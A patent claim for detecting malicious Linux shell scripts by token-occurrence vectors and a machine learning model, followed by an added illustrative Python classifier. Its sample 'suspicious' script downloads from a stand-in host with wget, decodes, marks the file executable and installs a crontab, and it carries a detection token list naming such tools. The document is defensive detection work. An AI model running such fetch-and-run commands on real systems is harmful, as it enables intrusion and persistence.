| CPC G06F 21/566 (2013.01) [G06N 20/10 (2019.01); G06F 2221/034 (2013.01)] | 10 Claims |

|
1. A method of detecting malicious shell scripts, the method comprising:
receiving a target shell script in a compute instance of a plurality of compute instances of a cloud computing platform, the compute instance running a distribution of a LINUX operating system;
normalizing the target shell script into a set of tokens, the set of tokens comprising tokens of the target shell script that are separated by a predetermined separator;
searching the set of tokens for presence of reference tokens, the reference tokens comprising predefined tokens that are found in malicious shell scripts that attack compute instances and predefined tokens that are found in non-malicious shell scripts of compute instances;
counting a number of times each of the reference tokens appears in the set of tokens;
generating an occurrence vector of the target shell script, the occurrence vector indicating a count of each of the reference tokens found in the set of tokens; and
evaluating the occurrence vector in the compute instance using a machine learning model to determine if the target shell script is a malicious shell script.
|
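The steps of claim 1 (normalize, search and count, build the occurrence vector, evaluate) can be illustrated with the following added example, which is not code from the patent or its assignee. The reference token list, the separator pattern, the sample scripts, and the linear model with its weights are all constructed assumptions; the claim only specifies "a machine learning model".

```python
import math
import re
from collections import Counter

# Constructed reference tokens (assumption): the claim calls for tokens found in
# malicious scripts and tokens found in non-malicious scripts, but lists none.
REFERENCE_TOKENS = ["curl", "wget", "chmod", "base64", "crontab",
                    "echo", "cd", "mkdir", "tar", "exit"]
# Constructed weights for a stand-in linear classifier (assumption); a real
# deployment would load a model trained on labelled occurrence vectors.
WEIGHTS = [0.9, 0.9, 0.6, 1.4, 1.2, -0.3, -0.4, -0.5, -0.4, -0.2]
BIAS = -1.5
SEPARATOR = re.compile(r"[\s;|&()<>]+")  # assumed "predetermined separator"

# Constructed sample inputs, not taken from any real incident.
BENIGN = ("#!/bin/sh\n# rotate build output\nmkdir -p /tmp/build\n"
          "cd /tmp/build\ntar czf out.tgz src\necho done\nexit 0\n")
SUSPICIOUS = ("wget http://example.invalid/a -O /tmp/a\n"
              "base64 -d /tmp/a > /tmp/b\nchmod +x /tmp/b\ncrontab /tmp/c\n")


def normalize(script):
    """Drop comment lines, lowercase, and split on the separator."""
    lines = [ln for ln in script.splitlines() if not ln.lstrip().startswith("#")]
    return [tok for tok in SEPARATOR.split("\n".join(lines).lower()) if tok]


def occurrence_vector(tokens):
    """Count of each reference token, in REFERENCE_TOKENS order."""
    counts = Counter(tokens)
    return [counts[ref] for ref in REFERENCE_TOKENS]


def score(vector):
    """Logistic score in (0, 1) from the stand-in linear model."""
    z = BIAS + sum(w * x for w, x in zip(WEIGHTS, vector))
    return 1.0 / (1.0 + math.exp(-z))


def is_malicious(script, threshold=0.5):
    return score(occurrence_vector(normalize(script))) >= threshold


if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        vec = occurrence_vector(normalize(text))
        print(name, vec, round(score(vec), 3), is_malicious(text))
```

Because the vector has a fixed length and order defined by the reference token list, the same list must be used at training time and at evaluation time on the compute instance.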